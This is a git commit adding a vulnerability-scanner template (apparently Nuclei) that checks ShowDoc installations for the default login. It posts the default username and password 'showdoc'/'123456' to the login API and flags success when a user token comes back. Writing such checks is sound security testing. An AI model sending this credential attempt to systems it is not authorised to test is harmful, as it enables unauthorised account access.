Create showdoc-default-password.yaml

patch-1
PikPikcU 2021-05-09 11:37:23 +00:00 committed by GitHub
parent 64c91bf896
commit dd1384f971
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23
1 changed files with 29 additions and 0 deletions

View File

@ -0,0 +1,29 @@
id: showdoc-default-password
info:
name: Showdoc Default Password
author: pikpikcu
severity: medium
reference: |
- https://blog.star7th.com/2016/05/2007.html
tags: showdoc,dlogin
requests:
- method: POST
path:
- "/server/index.php?s=/api/user/login"
body: |
username=showdoc&password=123456
matchers-condition: and
matchers:
- type: word
words:
- "groupid"
- "user_token"
condition: and
- type: status
status:
- 200